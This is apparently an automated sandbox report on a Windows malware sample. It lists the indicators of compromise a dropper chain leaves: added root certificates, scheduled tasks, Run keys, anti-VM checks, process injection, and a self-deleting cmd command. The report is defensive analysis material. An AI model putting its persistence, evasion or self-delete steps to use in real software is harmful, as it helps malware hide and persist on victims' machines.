description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 futors.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e futors.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e futors.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 7c26c6a0f8.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e futors.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 7c26c6a0f8.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 7c26c6a0f8.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 cbe223688e.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a cbe223688e.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2124 schtasks.exe 1764 schtasks.exe 2876 SCHTASKS.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2520 53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe 2996 rapes.exe 1052 UD49QH6.exe 1052 UD49QH6.exe 1052 UD49QH6.exe 1052 UD49QH6.exe 1052 UD49QH6.exe 1680 powershell.exe 1680 powershell.exe 1680 powershell.exe 2828 Temp5U5JI8KIGLLDZMITIZXKVREEPLQJL6VN.EXE 600 powershell.exe 2172 powershell.exe 2132 powershell.exe 2408 powershell.exe 1916 7c26c6a0f8.exe 2408 powershell.exe 2408 powershell.exe 1004 483d2fa8a0d53818306efeb32d3.exe 620 a732227be0.exe 620 a732227be0.exe 620 a732227be0.exe 620 a732227be0.exe 620 a732227be0.exe 2200 df0bb5d7c6.exe 2008 GGM65FE7W5E2IVW6D.exe 1500 5c15ee7bad.exe 1916 7c26c6a0f8.exe 1916 7c26c6a0f8.exe 1916 7c26c6a0f8.exe 1916 7c26c6a0f8.exe 2768 crypted.exe 2768 crypted.exe 2768 crypted.exe 2768 crypted.exe 3836 2331254737.exe 3836 2331254737.exe 1500 5c15ee7bad.exe 1500 5c15ee7bad.exe 1500 5c15ee7bad.exe 3836 2331254737.exe 3836 2331254737.exe 3444 00282f69cd.exe 3444 00282f69cd.exe 3444 00282f69cd.exe 3444 00282f69cd.exe 3324 cbe223688e.exe 3324 cbe223688e.exe 3688 e80c7de81f.exe 3688 e80c7de81f.exe 3992 334c4d4149.exe 3992 334c4d4149.exe 3132 334c4d4149.exe 3132 334c4d4149.exe 3132 334c4d4149.exe 3112 53a0816cdb.exe 3112 53a0816cdb.exe 3112 53a0816cdb.exe 3704 UD49QH6.exe 3704 UD49QH6.exe 3704 UD49QH6.exe 3704 UD49QH6.exe 3704 UD49QH6.exe 3704 UD49QH6.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 3940 SplashWin.exe 2356 cmd.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 1680 powershell.exe Token: SeDebugPrivilege 600 powershell.exe Token: SeDebugPrivilege 2172 powershell.exe Token: SeDebugPrivilege 2132 powershell.exe Token: SeDebugPrivilege 2408 powershell.exe Token: SeDebugPrivilege 1188 cronikxqqq.exe Token: SeDebugPrivilege 580 taskkill.exe Token: SeDebugPrivilege 2620 taskkill.exe Token: SeDebugPrivilege 2480 taskkill.exe Token: SeDebugPrivilege 2056 taskkill.exe Token: SeDebugPrivilege 2732 taskkill.exe Token: SeDebugPrivilege 1596 firefox.exe Token: SeDebugPrivilege 1596 firefox.exe Token: SeDebugPrivilege 3836 2331254737.exe -
Suspicious use of FindShellTrayWindow 21 IoCs
pid Process 2520 53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe 1856 amnew.exe 620 36407e4594.exe 620 36407e4594.exe 620 36407e4594.exe 1500 5c15ee7bad.exe 1500 5c15ee7bad.exe 1500 5c15ee7bad.exe 1500 5c15ee7bad.exe 1500 5c15ee7bad.exe 1500 5c15ee7bad.exe 1500 5c15ee7bad.exe 1596 firefox.exe 1596 firefox.exe 1596 firefox.exe 1596 firefox.exe 1500 5c15ee7bad.exe 1500 5c15ee7bad.exe 1500 5c15ee7bad.exe 1500 5c15ee7bad.exe 3988 zY9sqWs.exe -
Suspicious use of SendNotifyMessage 17 IoCs
pid Process 620 36407e4594.exe 620 36407e4594.exe 620 36407e4594.exe 1500 5c15ee7bad.exe 1500 5c15ee7bad.exe 1500 5c15ee7bad.exe 1500 5c15ee7bad.exe 1500 5c15ee7bad.exe 1500 5c15ee7bad.exe 1500 5c15ee7bad.exe 1596 firefox.exe 1596 firefox.exe 1596 firefox.exe 1500 5c15ee7bad.exe 1500 5c15ee7bad.exe 1500 5c15ee7bad.exe 1500 5c15ee7bad.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3392 HmngBpR.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2520 wrote to memory of 2996 2520 53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe 30 PID 2520 wrote to memory of 2996 2520 53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe 30 PID 2520 wrote to memory of 2996 2520 53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe 30 PID 2520 wrote to memory of 2996 2520 53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe 30 PID 2996 wrote to memory of 1052 2996 rapes.exe 32 PID 2996 wrote to memory of 1052 2996 rapes.exe 32 PID 2996 wrote to memory of 1052 2996 rapes.exe 32 PID 2996 wrote to memory of 1052 2996 rapes.exe 32 PID 2996 wrote to memory of 1028 2996 rapes.exe 34 PID 2996 wrote to memory of 1028 2996 rapes.exe 34 PID 2996 wrote to memory of 1028 2996 rapes.exe 34 PID 2996 wrote to memory of 1028 2996 rapes.exe 34 PID 2996 wrote to memory of 1856 2996 rapes.exe 35 PID 2996 wrote to memory of 1856 2996 rapes.exe 35 PID 2996 wrote to memory of 1856 2996 rapes.exe 35 PID 2996 wrote to memory of 1856 2996 rapes.exe 35 PID 1856 wrote to memory of 840 1856 amnew.exe 36 PID 1856 wrote to memory of 840 1856 amnew.exe 36 PID 1856 wrote to memory of 840 1856 amnew.exe 36 PID 1856 wrote to memory of 840 1856 amnew.exe 36 PID 2996 wrote to memory of 620 2996 rapes.exe 39 PID 2996 wrote to memory of 620 2996 rapes.exe 39 PID 2996 wrote to memory of 620 2996 rapes.exe 39 PID 2996 wrote to memory of 620 2996 rapes.exe 39 PID 620 wrote to memory of 1724 620 36407e4594.exe 40 PID 620 wrote to memory of 1724 620 36407e4594.exe 40 PID 620 wrote to memory of 1724 620 36407e4594.exe 40 PID 620 wrote to memory of 1724 620 36407e4594.exe 40 PID 620 wrote to memory of 924 620 36407e4594.exe 41 PID 620 wrote to memory of 924 620 36407e4594.exe 41 PID 620 wrote to memory of 924 620 36407e4594.exe 41 PID 620 wrote to memory of 924 620 36407e4594.exe 41 PID 1724 wrote to memory of 2124 1724 cmd.exe 43 PID 1724 wrote to memory of 2124 1724 cmd.exe 43 PID 1724 wrote to memory of 2124 1724 cmd.exe 43 PID 1724 wrote to memory of 2124 1724 cmd.exe 43 PID 924 wrote to memory of 1680 924 mshta.exe 44 PID 924 wrote to memory of 1680 924 mshta.exe 44 PID 924 wrote to memory of 1680 924 mshta.exe 44 PID 924 wrote to memory of 1680 924 mshta.exe 44 PID 1680 wrote to memory of 2828 1680 powershell.exe 46 PID 1680 wrote to memory of 2828 1680 powershell.exe 46 PID 1680 wrote to memory of 2828 1680 powershell.exe 46 PID 1680 wrote to memory of 2828 1680 powershell.exe 46 PID 2996 wrote to memory of 2564 2996 rapes.exe 47 PID 2996 wrote to memory of 2564 2996 rapes.exe 47 PID 2996 wrote to memory of 2564 2996 rapes.exe 47 PID 2996 wrote to memory of 2564 2996 rapes.exe 47 PID 2564 wrote to memory of 2732 2564 cmd.exe 49 PID 2564 wrote to memory of 2732 2564 cmd.exe 49 PID 2564 wrote to memory of 2732 2564 cmd.exe 49 PID 2564 wrote to memory of 2732 2564 cmd.exe 49 PID 2564 wrote to memory of 880 2564 cmd.exe 50 PID 2564 wrote to memory of 880 2564 cmd.exe 50 PID 2564 wrote to memory of 880 2564 cmd.exe 50 PID 2564 wrote to memory of 880 2564 cmd.exe 50 PID 880 wrote to memory of 600 880 cmd.exe 51 PID 880 wrote to memory of 600 880 cmd.exe 51 PID 880 wrote to memory of 600 880 cmd.exe 51 PID 880 wrote to memory of 600 880 cmd.exe 51 PID 2564 wrote to memory of 2176 2564 cmd.exe 52 PID 2564 wrote to memory of 2176 2564 cmd.exe 52 PID 2564 wrote to memory of 2176 2564 cmd.exe 52 PID 2564 wrote to memory of 2176 2564 cmd.exe 52 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe"C:\Users\Admin\AppData\Local\Temp\53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Users\Admin\AppData\Local\Temp\10235300101\UD49QH6.exe"C:\Users\Admin\AppData\Local\Temp\10235300101\UD49QH6.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1052
-
-
C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe"C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:1028 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe" & exit4⤵
- System Location Discovery: System Language Discovery
PID:896 -
C:\Windows\SysWOW64\timeout.exetimeout /t 55⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2504
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10238250101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10238250101\amnew.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:840 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"5⤵
- Executes dropped EXE
